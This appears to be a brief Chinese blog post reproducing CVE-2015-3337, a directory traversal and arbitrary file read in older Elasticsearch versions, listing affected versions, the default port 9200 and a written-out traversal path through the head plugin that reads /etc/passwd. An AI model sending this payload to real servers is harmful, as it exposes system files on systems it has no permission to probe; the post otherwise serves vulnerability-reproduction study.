ElasticSearch

1.漏洞复现

CVE-2015-3337 目录穿越/任意文件读取

影响范围:ElasticSearch <1.4.5/<1.5.2

默认端口9200,用Burp重放,/_plugin/head/../../../../../../../../../etc/passwd

posted @ 2023-01-13 02:32  Hacker&Cat  阅读(21)  评论(0编辑  收藏  举报